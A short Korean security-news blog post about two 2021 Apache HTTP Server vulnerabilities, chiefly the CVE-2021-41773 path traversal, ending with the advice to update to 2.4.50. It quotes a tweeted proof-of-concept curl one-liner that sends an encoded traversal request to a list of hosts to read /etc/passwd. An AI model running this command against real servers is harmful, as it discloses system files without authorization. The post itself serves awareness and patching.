CVE-2021-41524 : null pointer dereference in h2 fuzzing (위험도)
CVE - CVE-2021-41524
20210920 Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
cve.mitre.org
CVE-2021-41773 : Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (위험도 높음)
CVE - CVE-2021-41773
20210929 Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.
cve.mitre.org
https://twitter.com/HackerGautam/status/1445412108863041544
Rohit Gautam 🤘🏴☠️ on Twitter
“CVE-2021-41773 POC 🔥👇 ✅ One Liner : cat targets.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0
twitter.com
$host/cgi-bin/../../../../etc/passwd 이게 먹다니.... apache 무슨 일입니까,,,
대응방법 -> apache 2.4.50 으로 업데이트
'보안동향' 카테고리의 다른 글
| 2021.10.25 KT 네트워크 장애 (라우팅 오류 O ,DDoS X) (0) | 2021.10.25 |
|---|---|
| Apach Tomcat DoS 취약점(CVE-2021-42340) (0) | 2021.10.17 |
| OWASP Top10 2021 - 신규 취약점은? (0) | 2021.09.09 |
| 중국 [데이터 보안법] 21년 09월 01일 부터 시행 (0) | 2021.09.06 |
| 윈도우 관리자 권한 얻게 하는 Razer의 제로데이 취약점 (0) | 2021.08.24 |
